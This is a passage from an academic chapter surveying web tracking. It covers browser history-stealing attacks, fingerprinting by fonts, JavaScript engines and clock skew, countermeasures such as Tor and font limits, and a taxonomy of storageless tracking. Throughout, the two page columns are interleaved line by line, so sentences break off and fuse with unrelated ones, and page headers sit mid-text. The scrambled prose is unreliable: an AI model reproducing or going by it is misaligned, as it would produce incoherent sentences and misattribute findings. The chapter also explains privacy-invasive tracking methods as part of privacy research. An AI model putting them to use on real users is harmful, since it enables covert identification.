This algorithm is equal to a CSS-based attack, Interactive CSS-Based Attacks with hyperlinks to domains belonging to the same category behaving the same way, which makes Modern browsers inhibit classical CSS-based them indistinguishable for the attacker. attacks; nonetheless, style sheets can still be ap- Early proposed countermeasures against auto- plied to hyperlinks. If the user can be tricked into mated CSS-based history stealing attacks include disclosing the applied style of a set of elements, URL personalization (Jakobsson & Stamm, 2006) history stealing can still be feasible, albeit at a and history pollution (Jakobsson & Stamm, 2007). lower speed and for fewer URLs (Rows E through The first proposition alters all URLs under the J, Table 2). Weinberg et al. (2011) detail four domain according to a user-specific pseudonym, attacks, all of which are meant to be disguised thereby making guessing URLs impossible. The as CAPTCHAs (Completely Automated Public second one would insert entries into the history that Turing test to tell Computers and Humans Apart; point to sites that are of a similar nature to those a puzzle that can easily be solved by a human, actually visited by the user–this way, the attacker but is normally difficult for computer software). cannot distinguish between fake and real history CAPTCHAs normally ask the user to, for example, entries. Other authors proposed the extension of recognize and type some slightly distortedly ren- the same-origin policy to caching and visited link dered letters, or to provide the right answer to a differentiation (Jakobsson et al., 2006). dynamically generated, simple question, such as N.b. that these defenses did not make automated “How much is 2 + 2?” CSS-based history stealing completely infeasible. The first of the four attacks shows words to However, in Firefox 4, the vulnerability was thor- the user, while the second one displays specially oughly patched in April, 2010 by making CSS constructed characters on seven-segment displays. behave similarly for visited and unvisited links The user is asked to type all words or characters (Baron, 2002), and also by removing certain CSS into a text field, which completes the attack. The features (Baron, 2010; Stamm, 2010). first attack infers one visited URL per word,
147 Tracking and Fingerprinting in E-Business
while a character represents four for the second the browser will initiate an HTTPS connection attack. The third attack draws a chessboard, and for the “right” domains only. This mechanism maps each square to a URL. Then, a chess piece can be used similarly to determine visited links is drawn into the square if the corresponding URL where such a setting was used. One can think of is visited; otherwise, the square is empty. The user this algorithm as a mixture of a tracking cookie is then asked to click all squares where she sees a and history stealing. However, it is arguably more chess piece. Finally, the fourth interactive attack is effective than that, since HSTS policy entries similar to a jigsaw puzzle: the user must click on are meant to stay in the browser for a long time. the pieces of which a composite picture is made A viable countermeasure would be to enforce a up. These attacks work, but at a very low URL single policy for all subdomains. detection speed; therefore, they are less viable for general profiling, but may be used in some Summary of History Stealing Attacks targeted attacks (e.g., in phishing attacks). In the empirical study of Jang et al. (2010) over Side-Channel CSS-Based Attacks the Alexa top 50,000 sites, it was shown that 485 sites inspected the style properties of elements that Miscellaneous methods include the webcam at- could leak browser history. Out of these sites, 46 tack (Weinberg et al., 2011), which renders visited confirmedly performed the classical, JavaScript- links with a blinking style, and recognizes this by enhanced, CSS-based history stealing, and then processing images recorded with the user’s Web transferred the result to some server; 36 of them camera (Row I, Table 2). Obtaining permission used “off-the-shelf” history stealing code from to use the Web camera may be problematic, but third-party domains. Further 326 sites inspected the required image processing algorithm is not a vast amount of domains, but Jang et al. could very complex (but a simple, homogeneous back- not confirm that the history information was sent ground may be required behind the person using to any server. the computer). We have summarized the key features of all attacks discussed hitherto in Table 2 and Table 3; Leaking History Through we have separated query-based and timing-based Security Policies attacks (See our taxonomy) for better clarity. The following properties are listed for each attack: HTTP Strict Transport Security (HSTS) defines Accuracy: High accuracy means few or zero an HTTP header that forces the browser to initi- false positives and false negatives; it can be seen ate a secure HTTPS connection to a Website that that most attacks belong to this category. However, was originally requested through plain HTTP. The both the construction and accuracy of cross-site browser stores this setting, so that subsequent timing are highly dependent on the site to be at- requests are made via HTTPS. Previously we tacked, and therefore a general result cannot be mentioned that this functionality can be exploited given for it. Moreover, privacy-preserving history to store an identifier, but also to leak history mining is moderately accurate on purpose. The (Davidov, 2011). webcam attack is, however, moderately accurate For storage purposes, an adversary can “burn per se, according to Weinberg et al. (2011). Other in” a unique alphanumerical identifier into the attacks by the same authors are highly reliable for browser as a set of HSTS policy entries–that a compliant user. Finally, the result of enhanced is, through subdomains under the control of the cache timing is based on our very limited experi- attacker–and query it later on. Upon retrieval,
148 Tracking and Fingerprinting in E-Business
ments; in other setups, the attacks might perform fingerprinted, a reproducible, unique identifier is better. calculated, which can be easily recalculated with Speed. Most variants of classical, CSS-based a high probability during a subsequent visit or history stealing can query hundreds of thousands when visiting another site, even if all client-side of URLs per minute, while hundreds may be fea- storages are cleared. Various information can serve sible with cache-based attacks (except the newer, as a basis of fingerprinting, such as the hardware enhanced ones). Obviously enough, attacks that parameters, unique features in network communi- require user interaction have the lowest speed. cation (e.g., the IP address or timing), or software We have not been able to determine the speed of settings and capabilities (such as OS brand, list cross-site timing attacks, and we find the two sites of installed plugins, browser agent information). tested by Bortz et al. too few to draw a conclusion. Regardless of the considered features, economi- Technology: Here we enumerate the technolo- cally valuable fingerprinting techniques should gies that are used by the attacks. We have not in- not be sensitive for changes in the attributes taken cluded self-evident ones, such as HTTP or TCP/IP. into account during identification. Countermeasures: Here we enumerate the Although both history stealing and fingerprint- countermeasures that can be used to defeat (or ing techniques are storageless, we argue that it at least cripple) an attack. Again, we have not makes sense to differentiate between them, as included any self-evident methods (such as delet- the prior are based on state (browsing history, ing the browsing history and/or the cache of the caches, etc.), while the latter are setting- and browser, disabling JavaScript in order to avoid attribute-based. The principal difference is that JavaScript-based attacks, or covering the Web the client state can be influenced by the attacker camera in order to defeat webcam attacks), so and Websites (this is why client state can be ex- “unknown” does not always imply that the user ploited to operate as a storage, e.g., in the case of is powerless; then again, many of these counter- operational caches), but attributes and settings can measures do not allow a fine-grained tradeoff only be changed by the user. This classification is between browsing experience and privacy, so further refined in a subsequent section. the implementation of better defenses might be Probably the earliest fingerprinting attempt desirable. By “Baron’s defenses,” we mean all used for identification was mentioned in the thesis countermeasures discussed by Baron (2010), of Mayer (2009), and the Panopticlick project and later implemented as a bug fix in (Baron, (Eckersley, 2010) was the first empirical experi- 2002), that is, making the style that is applied to ment on a large user base. There are even more hyperlinks inaccessible for JavaScript programs, earlier fingerprinting attempts like the passive OS modifying the way how CSS styles are applied to fingerprinting of Miller (2002), or tools such as hyperlinks, and disabling certain CSS features. the browser identification tool, the Browserrecon Harm: In this column, we list the consequences (Ruef, 2008), which used HTTP request headers of a successful execution of each attack, i.e., how for identification; however, these rather focused detrimental it is to the privacy of the user. on revealing real device and software attributes (i.e., discovering the OS type and the user agent string, respectively (also called OS and application FINGERPRINTING ON THE WEB fingerprinting)), instead of measuring uniqueness and large-scale identifiability. Although these are Fingerprinting is an emerging, storageless identi- not applicable for tracking, they can be used for fication technique on the Web replacing storage- detecting client attributes, as an additional source based techniques. When the client device is being for another type of fingerprinting.
149 Tracking and Fingerprinting in E-Business
Shortly after the Panopticlick project was future, similar techniques, with a wider-scale use published, companies started to switch from will emerge on the market of tracking. cookie-based to fingerprinting tracking techniques (Marshall, 2011), since fingerprinting works even Information-Based in the case of privacy-conscious users who delete Fingerprinting Techniques cookies regularly and use private mode, as in both cases, these efforts are useless against fingerprint- Information-based fingerprinting techniques ing (Boda et Al., 2012). Although we must note query and collect high-level client attributes (read that some companies, such as 41st Parameter, values of variables, constants, or measure certain had used fingerprinting even before the thorough characteristics) and settings for fingerprinting academic analysis began (Eckersley, 2010). In ad- (e.g., from the OS or the browser). Here we review dition, the EU regulation on tracking cookies–often the most relevant information-based fingerprint- referred to as the “cookie law”–merely added fuel ing techniques, and the related countermeasures. to the fire, since it prohibited the use of all kinds One of the earliest fingerprinting techniques, of storages for tracking unless the user consented Browserrecon, targeted the family and version of (Loveless, 2011), and inspired advertisers to seek the browser agent. Browserrecon regarded the user ways of circumvention. agent string to be fake, and instead it inspected the Nowadays, several companies offer finger- sent HTTP headers, as the header lines and their printing based behavioral tracking such as Blue- values differ for each browser family, sometimes Cava Inc., Iovation Inc., 41st Parameter, claiming even between versions, too. Norbert (2011) con- to provide device identification applicable to all firms this for Firefox, and in addition mentions kinds of devices; however, some trackers use a method of distinguishing Firefox from other fingerprinting only as a complementary solution browsers, as it is the only browser that makes a to regular techniques, as is the case of TradeDou- second request for the favicon if it is not found bler, where the device fingerprint is calculated as for the first time. a hash of the user agent string and the IP address, Occasionally, particular (or even identifying) and then used to track ad clicks (Wramner, 2011). information is sent through the headers. For ex- In this section, we review fingerprinting tech- ample, an installation of Microsoft Office causes niques, the related anonymity paradox (i.e., when changes to the Internet Explorer HTTP accept forged information makes the subject even more headers (Wramner, 2011); or as another example, outstanding from the crowd than as without), some mobile ISPs intentionally leak private infor- and possible defenses from the literature. We mation (such as mobile phone numbers, roaming rigorously focus on technology-based solutions; status) of their subscribers through the request however, there is another type of fingerprinting that headers (Mulliner, 2010). However, headers need may be incorporated into business practices in the to be augmented with additional information for future: biometry-based fingerprinting. There is sci- effective, wide-scale fingerprinting, in order for entific evidence that real-life behavior and human- them to be suitable for tracking. In their work, computer interaction can be used for biometrical Yen et al. (2012) analyzed millions of hosts who identification (Yampolskiy & Govindaraju, 2008), visited the Hotmail and the Bing search services, and it has already been shown that typing patterns and concluded that 80% of users can be tracked are also personally identifying (Chairunnanda et by simply using the user agent strings augmented al., 2011), even mouse movement fingerprinting with IP prefix information as an identifier. (Feher et al., 2012). We believe that, in the near The thesis of Mayer (2009) was the first step towards classic information-based fingerprinting.
150 Tracking and Fingerprinting in E-Business
In his experiment, a test site was run, where the implement JavaScript and CSS-based font detec- navigator object, screen resolution, list of plugins, tion for fingerprinting. and acceptable MIME types were hashed together Moreover, the list of queried fonts was chosen as for creating the browser fingerprint. Although the basis of identification, based on the following only 1,328 clients were measured, this experi- assumption: as the list of installed software on a ment showed the potential in fingerprinting, as computer is unique, and so is the list of available unique fingerprints were obtained in 96.23% of fonts, since new applications can silently install all cases. It also turned out that, when plugin and fonts, too. Therefore, fingerprints were hashed MIME type lists are provided from Mozilla- and from the first two octets of the IP address, the WebKit-based browsers, they provide additional screen resolution, the time zone, and some se- entropy for fingerprinting. Eckersley showed that lected fonts–where all attributes were browser- this is true for Flash- and Java-based font detection independent (See Figure 4). The font feature (Eckersley, 2010). set was created in a way to eliminate values of Making use of the underlying principles, the uncertain and browser-dependent fonts, as some Panopticlick project was designed to test the fonts behave differently in different browsers. uniqueness of browser fingerprints on a larger In a 6-month period of collection, a total of scale (i.e., to determine the commercial viability 989 fingerprints were obtained, on which it was of such fingerprinting methods (Eckersley, 2010)). shown that JavaScript-based font detection was During the experiment, the uniqueness of differ- sufficient for unique identification (at least for ent attributes such as the user agent string, screen Windows and MacOS systems); however, due to resolution, font and plugin lists were measured, the low number of fingerprints created in multiple and self-information of combined attributes were browsers in parallel, the cross-browser property also measured–but not the joint entropy of cor- has remained a mere concept. This inspired the relating attributes, as Perry et al. notice (2011). Cross-browser fingerprinting test 2.0 (2012), as Until the beginning of the analysis, the project an attempt to prove the viability of such tracking. had gathered 286,777 fingerprints, from which The basic concepts remained the same, but there 94.2% were unique if plugins were enabled (and were some changes: the font feature list was refined only a further 4.8% had anonymity sets at least (based on lessons learned from the first test), the of two users), and Eckersley provided a simple first two IP octets were omitted, and an ever- but precise algorithm that can follow changes in cookie was optionally set to support future fingerprints (i.e., due to browser or plugin updates) analysis (for which some additional info is also with an accuracy of 99.1%. collected but not included in the fingerprint, such The Panopticlick project inspired the idea of as the list of plugins). cross-browser fingerprinting (Boda et Al., 2012), There are several other fingerprinting ex- where two major improvements were made. periments similar to Panopticlick and the cross- Panopticlick used attributes that were browser- browser fingerprinting test, but we chose to omit dependent (e.g., the user agent string), and it them, as we deemed that they did not deliver was also plugin-dependent, since precise results groundbreaking novelties; however, there are were provided only by using either Flash or Java fundamentally different ones that are worth to collect font lists (which is a rather important mentioning. Whitelist fingerprinting (Mowery source of entropy). Although Eckersley (2010) et al., 2011) is an attack against Firefox with the mentioned CSS-based font enumeration, the work NoScript extension installed. NoScript allows of Boda et al. (2012) is the first known attempt to users to completely block JavaScript, unless the site in question is included on a whitelist. The
151 Tracking and Fingerprinting in E-Business
Figure 4. Single vs. cross-browser fingerprint: values need to be filtered to obtain system- and not- browser-specific information as an input for the fingerprint
rationale behind the algorithm is that the user is browser versions with an accuracy of 100%–this likely to whitelist sites of her interest that would not claim was verified by inspecting the UAS of the work with blocked JavaScript. The attack embeds browser and by asking the user about the exact a JavaScript program into a Web page and checks version of the browser. Arguably, this information for hallmarks of a successful execution. For a large alone is little for unique identification, but may be set of domains, the pattern of “whitelist hits” may used as an additional source in tracking methods. be enough to fingerprint a user, but the efficiency Norbert (2011) proposes to use somewhat rarely- of this fingerprinting scheme on a large user base used JavaScript calls like arguments.callee(). is not known. Another problem of the attack is its toString() to discover subtle differences between small-scale usability. the JavaScript implementations of browsers. Reschl et al. (2011) discuss a fingerprinting Mowery et al. (2011) constructed another method that aims to discover the version of the browser and OS fingerprinting algorithm, but browser through examining the behavior of the based it on off-the-shelf JavaScript test scripts JavaScript implementation. Globally-available (i.e., benchmarks). The accuracy of guessing JavaScript test suites are used to discover the exact the browser family was 98.2%, and guessing the browser version. In a survey with 189 participants, correct browser version was successful in 79.8% the test suite ran in 90ms on an average PC, and of all cases. The operating system fingerprinting 200ms on a smartphone, and identified supported was performed within a chosen browser version,
152 Tracking and Fingerprinting in E-Business
namely Firefox 3.6. Versions of Windows (7, Kohno et al. (2005) experimented with fin- Vista, and XP) could be distinguished with an gerprinting computers based on the clock skews accuracy of 98.5% (due to the lack of volunteers they exhibit. Skew of two clocks is defined as other systems were not measured). the difference between the rates with which they advance. Two attacker models are discussed: one Hardware and Network Level where the clock skew is calculated for TCP time- Fingerprinting Techniques stamps, and one where the attacker bombards the fingerprinted computer with ICMP Timestamp Besides browser and OS fingerprinting, Mowery Requests, and estimates the skew of the system et al. (2011) also discussed a CPU architecture clock based on the values in the incoming ICMP fingerprinting algorithm that had a success rate Timestamp Replies. According to Kohno et al., of 45.3%. This is not very precise, and has an as the TCP timestamp-based fingerprint remains long runtime as their OS and browser fingerprint- stable even if the attacked computer frequently ing technique. That said, hardware fingerprinting synchronizes its system clock with a Network is also possible by looking for minor differences Time Protocol (NTP) time server. Furthermore, between images rendered by different hardware both methods yield similar results if the system (Mowery & Shacham, 2012) onto the
153 Tracking and Fingerprinting in E-Business
so-estimated clock skew is largely independent (e.g., varying the number of resources that are from the network medium, and the only notable fetched in one go), but that could possibly introduce exception is the use of a virtual machine, which inconsistencies into the user experience. produces a different–but stable–clock skew upon every reboot. Furthermore, Huang et al. conducted The Anonymity Paradox: Use an experiment with 100 devices, and found that Camouflage with Wisdom the false negative and false positive rates are at most 8%. Before discussing defenses against fingerprinting, However, we would like to highlight that the we should mention the anonymity paradox (i.e., applicability of the algorithm for its original when one’s efforts result in even stronger identifi- purpose of enhancing authentication is somewhat ability instead of preserving her privacy). Let us questionable, as at least 200 AJAX requests are imagine that, as a means of protection, someone required to get a meaningfully precise clock skew changes the user agent string of the browser to an estimate, which takes 16.7 minutes. We argue, empty string. This clearly preserves some privacy however, that the algorithm can successfully and as it prevents information loss, but it is also likely clandestinely fingerprint a user if the attacker’s that it uniquely identifies her (and makes her Web page is kept open for a long time (e.g., when traceable), since such user agent strings are not reading a news site or taking a coffee break, but very common. This is like putting on a ski mask not when logging in to a webmail service). in a bank; if you are the only one doing this, you Yen et al. (2009) try to identify browser fami- are anonymous, but also in focus (and very likely lies based on other types of summarized traffic to be caught). See Figure 5 for a fingerprinting- metadata of information flows. They examine related example. 9 features of TCP connections (e.g., their byte Eckersley (2010) brings up Privoxy users as count and duration). Firstly, the authors tested examples, whose user agent strings had 15.5 bits their classification method based on a data set of identifying information alone. Similarly, brows- comprising traffic from Windows-based hosts. The ing the Web with Tor can also be a marker for algorithm was tested by data originating from a fingerprinting, according to the measurements of single browser instance, and trained by the rest of Hubner et al. (2010), who found that only 22% of the data set. It was found that the correct browser Tor users used TorButton to browse the Web. family could be identified with a precision of at Perry et al. (2011) go even further and state that least 71%, but even 100% was achievable after every single altered option can be used for fin- slight adjustments to the parameters. Then, the gerprinting; for example, user customized filters algorithm was also tested in a real-world-like can be suitable targets, just as in the case of scenario, where the precision of classifying Firefox whitelist fingerprinting. and Opera browsers was calculated for several In connection to fingerprinting, such and parameters, and it peaked at 74.56%. similar phenomena–that is, when client state is In our opinion, this algorithm can probably be altered in order to protect privacy, but due to the extended to several browser families (and possibly low user base doing the same it achieves identifica- versions), as implied by the authors. However, tion rather than anonymity–are referred to in the requiring the summary of a vast amount of data literature as the Panopticlick or the fingerprinting imposes a lower bound on the capabilities of the paradox (The Simple Computer, 2012; Broenik, attacker. As far as the possible countermeasures 2012) and also discussed in Eckersley (2010) and are concerned, it might be possible to make the Perry et al. (2011). However, this concept can be browser “randomize” its traffic characteristics generalized beyond fingerprinting, and can occur
154 Tracking and Fingerprinting in E-Business
Figure 5. The anonymity paradox illustrated: camouflaging is not enough, as anonymity set size also matters. There are three visitors who were using a counter fingerprinting technology, masking them- selves as Firefox 15 users. However, one of the visitors used unusual camouflage settings which made her identifiable and trackable, but the others had an anonymity set size of 2.
in other scenarios while using privacy enhancing shelf solutions created by professionals, such as technologies (PETs), thus we call it the anonym- Tor Browser Bundle (Tor, 2012), or JonDoFox ity paradox. with JonDo Proxy (JonDo, 2012), as both provide Therefore, substitution values must be chosen network-level anonymization, and also protection carefully, or should be used by a sufficient num- against most regular tracking techniques and ber of people. Attributes should blend the device privacy-violating attacks. In addition, develop- into the mass of others to achieve anonymity, and ers of both seek solutions to avoid fingerprinting multiple attributes regarded together should be attacks, too. chosen carefully. As an example of the latter, an Particularly suspicious users may use static iOS Safari user agent string coupled with a reso- virtual machine snapshots (burnt to a DVD or lution of 1280x1024 do not sound very realistic, reverted regularly) to protect their system against and provides a good source of information for tracking (The Simple Computer, 2012), which identification, too. In addition, one should consider also provides some protection against clock skew the possibility of session linkability, and should attacks as described previously, but, of course, this not change values randomly too often (e.g., at requires a sacrifice of some comfort. However, we every page load). note that in case of bad configuration, such systems provide a static fingerprint for tracking their user. Defending Against Fingerprinting Attacks Customizing the Browser
One needs to consider many aspects in order to For some reason, there are users who do not want achieve unobservability of her actions against to use complex solutions as previously discussed, fingerprinting attacks; first of all, as a starting but to build their own compilations instead (e.g., point it is presumed that no regular attacks will to add PETs as extensions to the Web browsing work against her (including IP-based tracking). applications they use every day). There are many Therefore, for the sake of simplicity (from the browser and system parameters to cover (e.g., time user’s viewpoint), we propose the use of off-the- zone, user agent string, language and character
155 Tracking and Fingerprinting in E-Business
set settings, accepted content types, headers), and probably seriously impede competition between there are some which cannot be masked without browser vendors and innovation. serious investigation and cumbersome hacking. One way of avoiding fingerprinting based on For instance, information related to screen and the characteristics of the JavaScript engine would content window resolutions need to be reduced, be to allow the user to choose the implementa- as alone this option is estimated to leak 29 bits of tion at will (e.g., with a browser extension). Of identifying information (Perry, 2011b), but a list course, this is hardly viable between different of “talkative” attributes may be further convincing browser families, and outright impossible for (e.g., JonDo Test, 2012). engines of closed-source browsers. Furthermore, In conclusion, in our opinion, building a custom this approach would possibly expose the user to software package seems futile, as a complete solu- security vulnerabilities of certain old JavaScript tion requires building an anonymous Web browser interpreters, or break the functionality of some (Gulyás et al., 2008) with several extensions and Web pages that are optimized for a certain ver- modifications. We agree with Perry et al. (2011), sion of an engine. who stated that “each option that detectably alters browser behavior can be used as a fingerprinting Recent Developments on tool,” and we just highlight whitelist fingerprint- Protecting the Font List ing again (Mowery et al., 2011) as an example. The entropy of the font list was found to be 13.9 Protection against JavaScript bits in the Panopticlick experiment, having the Engine Fingerprinting second highest value of all inspected attributes (Eckersley, 2010). Due to this finding, and the fact Unfortunately, none of the discussed JavaScript- that fonts can be detected in multiple ways (via based fingerprinting algorithms are trivial to pro- Flash, Java or JavaScript), fonts are likely to play tect against (Norbert, 2011; Reschl et al., 2011). an important role in fingerprint-based tracking. However, some attacks seem less threatening–even In addition, fonts also significantly influence the if we take the lack of effective countermeasures user experience of Web browsing, and therefore it into consideration–as they are not feasible to be is not possible to restrict the browser to a handful used in real-life situations. As a drawback of the of fonts (or at least such a modification will not fingerprinting suite of Mowery et al. (2011), its be accepted by the majority of users). runtime of several minutes seems to be prohibi- Firefox offers a simple option to restrict all tive, bar for Web pages that are normally left open possible fonts to a selection of four (i.e., Content for a long time (e.g., news sites). Mowery et al. > Fonts & Colors > Advanced > Allow pages argue that it might be possible to reduce the delay to choose their own fonts), which also helps in between the individual test scripts, which would impeding font-based fingerprinting, but it is not result in a more universally usable algorithm. a very user experience-friendly solution. There- We argue that functional aspects–such as fore, it seems most likely that Firefox will apply a which JavaScript test cases fail or execute in a patch to this solution (Viecco, 2012), which was certain timeframe–will always reveal the subtle developed for the Tor browser (Perry, 2011a). differences between browser families and even- The latter includes two novel options, namely tually–as bugs get fixed and JavaScript engines the browser.display.max_font_count and browser. evolve–versions within a family, too. This is display.max_font_attempts to limit the number of inevitable, unless all browsers include the exact fonts, and font load attempts, regulated on a per same JavaScript interpreter; however, this would page load basis (currently, test values are set as 5,
156 Tracking and Fingerprinting in E-Business
10 respectively). This method limits JavaScript- manipulated, but it might impose some–possibly based detection only; therefore, affected plugins hard-to-predict–changes on user experience. need to be disabled. For the problem of session linkability, we Taxonomy for Storageless suggest further modifications, as an attacker can Tracking Techniques test different fonts during sequential page loads. It is not likely that font lists collected this way To the best of our knowledge, this is the first would have a high entropy (at least for tracking taxonomy provided for storageless tracking tech- only by font lists), but they can be regarded as a niques. More precisely, we classify techniques significant additional entropy source. Therefore, using a single type of source at once; however, we propose to use these options in a per-domain techniques using multiple sources may emerge setting, with a user interface for necessary in- in the future (e.g., hardware-level fingerprinting teraction (e.g., clearing the cache of previously with browser functionality). Basically, there loaded fonts), which would not allow loading are three types of sources to take into account: new fonts if the user navigates to a new page on state information (e.g., caches), attributes (e.g., the same domain. screen resolution, font list, functionality test- The FireGloves add-on is a proof-of-concept ing) and settings (e.g., cookies enabled or not, utility (i.e., not a standalone extension providing whitelists). enhanced privacy) aiming to show a compromise In our taxonomy (depicted on Figure 6), first between good user experience and fingerprintabil- we differentiate history stealing from fingerprint- ity, thus it chooses a different approach to disable ing techniques by the fact that they are strictly font-based fingerprintability–namely rewriting state-based: history stealing attacks aim to extract the offsetWidth and offsetHeight getters in order state information from the client (i.e., from the to prohibit JavaScript font detection (FireGloves, user’s device or software (browser, OS, etc.)). As 2012). Although it has problems on some pages, it the state of the client changes during browsing offers a usable alternative; however, the solution of the Web, it can also be altered by the attacker in the Tor Browser with a per-domain setting would order to exploit it as a storage (e.g., HSTS cache). admittedly embody a better solution. This is the same reason why it is not used for fingerprinting, as it can change frequently. At- Defending Low-Level tacks discussed under history stealing can also Fingerprinting Attacks be additionally categorized either query-based or timing-based attacks. Protecting users against the threats of these We furthermore divide fingerprinting into fingerprinting attacks is hard. Hardware-based low-level and information-based fingerprinting techniques such as font rendering-based finger- subclasses. Exactly as discussed in this chap- printing can hardly be defeated from a browser, ter, low-level fingerprinting sources incorpo- as the fingerprintable information is provided by rate hardware- and network-level fingerprint- low-level software, such as the driver of a GPU, ing techniques, and the rest of the tracking or a layer of the operating system. Clock skew is techniques constitute the group of information- another example of a system feature that is out based fingerprinting methods. In addition, we of the reach of the browser. Of course, certain distinguish single-browser and cross-browser features of the browser (such as the number of fingerprinting techniques and classify dis- objects that are fetched in a single TCP session, cussed procedures as on Figure 6. As an alter- or the content of HTTP request headers) can be native, it is possible to distinguish information-
157 Tracking and Fingerprinting in E-Business
Figure 6. Taxonomy of the storageless tracking techniques
158 Tracking and Fingerprinting in E-Business
based fingerprinting techniques as passive or tracking regulations in effect, a longer battle active, based on whether they query client-side will take place. information (via JavaScript), or solely use In the last few years, a kind of a cat-and- information automatically revealed by the mouse game has taken place in the area of browser (Broenik, 2011; Mayer & Mitchell, tracking techniques, especially remarkably 2012). In our opinion, browser-dependency is for storage-based ones. When a novel tracking rather important that this attribute, and there- technique was discovered, in some time (after fore we defined our taxonomy accordingly. a sufficient rise in user awareness) a related protective solution arrived, which was shortly followed by a new identification method. This CONCLUSION: IS THERE ROOM cycle seems to repeat endlessly, over and over. FOR COOKIELESS TRACKING? Fortunately, history stealing seems to have been defeated; due to strong industrial intervention, As we highlighted in the chapter discussing the it is very unlikely for new, widely adoptable current state of the advertising and tracking and effective techniques to emerge. Neverthe- business, it is entirely clear that the industry less, for fingerprinting techniques, the match will not abandon tracking in response to user has just begun. countermeasures, but rather switch between This process indicates where research is technologies to bypass self-helping attempts needed for enhancing user privacy. As the tar- of privacy-conscious users and also to avoid get of tracking shifted from the browser to the related regulations. Users are not as aware of device, we expect a similar shift to biometric fingerprinting technologies as cookie- and other fingerprinting (i.e., tracking the person herself storage-based techniques, and, consequently, across multiple browsers, OSes, and devices). this favors fingerprint tracking. There are even Although fingerprinting countermeasures are tracker companies who advertise their service as far from being perfect (or widespread), and a solution for companies affected by the “cookie complex protective methods are yet examined law” in the EU (BlueCava, 2012). Therefore, we by the community (e.g., protecting both against expect that trackers will favor fingerprint-based font-based cross-browser fingerprinting and tracking against other techniques. clock-skew measurement), we believe it is time However, going forward, regulation will hit for researchers to start thinking about how to fingerprint-related tracking, too (at least in the cover biometric information sources. EU), but the industry will no doubt find a way to circumvent these regulations. For instance, it is not possible to forbid sites to query browser REFERENCES attributes entirely, since some are necessary for everyday operation. Even if these attributes Aggarwal, G., Bursztein, E., Jackson, C., & Boneh, are left out from the fingerprint measurements D. (2010). An analysis of private browsing modes either because of regulation or technical barri- in modern browsers. In Proceedings of the 19th ers, passive fingerprinting can still be used for USENIX Conference on Security (6-6). Berkeley, tracking. Therefore, we conclude that–regard- CA: USENIX Association. ing the current scenario–it is most likely that fingerprinting will spread among trackers, and in places having behavioral advertising and
159 Tracking and Fingerprinting in E-Business
Ayenson, M., Wambach, D. J., Soltani, A., Good, Broenink, R. (2012). Using Browser Properties N., & Hoofnagle, C. J. (2011). Flash Cookies for Fingerprinting Purposes. Presented at the 16th and Privacy II: Now with HTML5 and ETag Twente Student Conference on IT. Enschede, The Respawning. Social Science Research Network. Netherlands. Retrieved November 13, 2012, from http://ssrn. Buckinx, W., & Van den Poel, D. (2005). Predict- com/abstract=1898390 ing Online Purchasing Behavior. European Jour- Baron, D. (2002). Bug 147777 –:Visited sup- nal of Operational Research, 166(2), 557–575. port allows queries into global history. Bug- doi:10.1016/j.ejor.2004.04.022. zilla@Mozilla. Retrieved November 13, 2012, Bursztein, E. (2011, July 22). Tracking users that from https://bugzilla.mozilla.org/show_bug. block cookies with a HTTP redirect. Elie Bursz- cgi?id=147777 tein’s homepage. Retrieved November 13, 2012, Baron, D. (2010). Preventing attacks on a user’s from http://elie.im/blog/security/tracking-users- history through CSS:Visited selectors. David that-block-cookies-with-a-http-redirect/ Baron’s homepage. Retrieved November 13, 2012, Chairunnanda, P., Pham, N., & Hengartner, U. from http://dbaron.org/mozilla/visited-privacy (2011). Privacy: Gone with the Typing! Identifying Benninger, C. (2006). AJAX Storage: A Look Web Users by Their Typing Patterns. Presented at at Flash Cookies and Internet Explorer Persis- 4th Hot Topics in Privacy Enhancing Technolo- tence. Technical report. Retrieved November 13, gies, in conjunction with the 11th Privacy Enhanc- 2012, from http://citeseerx.ist.psu.edu/viewdoc/ ing Technologies Symposium. Waterloo, Canada. summary?doi=10.1.1.128.2523 Chandna, P. (2011). Adobe Releases Flash Player BlueCava. (2012). BlueCava releases “cookie- 10.3, Solves the ‘Flash Problem’. Maximum less” device identification technology for online PC. Retrieved November 13, 2012, from http:// advertisers. Press release. Retrieved November www.maximumpc.com/article/news/adobe_re- 13, 2012, from http://www.bluecava.com/news- leases_flash_player_103_solves_flash_problem release/bluecava-releases-cookie-less-device- Cranor, L. F. (2003). ‘I Didn’t Buy it for Myself ’ identification-technology-for-online-advertisers/ Privacy and Ecommerce Personalization. Institute Boda, K., Földes, Á. M., & Gulyás, G. Gy., & for Software Research. Retrieved November 13, Imre S. (2012). User Tracking on the Web via 2012, from http://repository.cmu.edu/isr/37 Cross-Browser Fingerprinting. In P. Laud (Ed.), Information Security Technology for Applications: Cross-browser fingerprinting test 2.0 (2012). Cross-browser fingerprinting test 2.0 16th Nordic Conference on Secure IT Systems, . Retrieved NordSec 2011, Tallinn, Estonia, October 26- November 13, 2012, from http://fingerprint.pet- portal.eu/?lang=en 28, 2011, Revised Selected Papers (pp. 31-46). Heidelberg, Germany: Springer-Verlag Berlin. Danis, M. (2011). Analysis of user tracking Retrieved fromhttp://dx.doi.org/10.1007/978-3- techniques in web feeds. Bachelor of Science 642-29615-4_4 Thesis. Retrieved November 13, 2012, from http:// pet-portal.eu/files/articles/2011/rss_tracking/ Bortz, A., Boneh, D., & Nandy, P. (2007). Expos- rss_tracking.pdf (in Hungarian) ing Private Information by Timing Web Applica- tions. In Proceedings of the 16th International Conference on World Wide Web (pp. 621–628). New York: ACM Press. Retrieved from http://doi. acm.org/10.1145/1242572.1242656
160 Tracking and Fingerprinting in E-Business
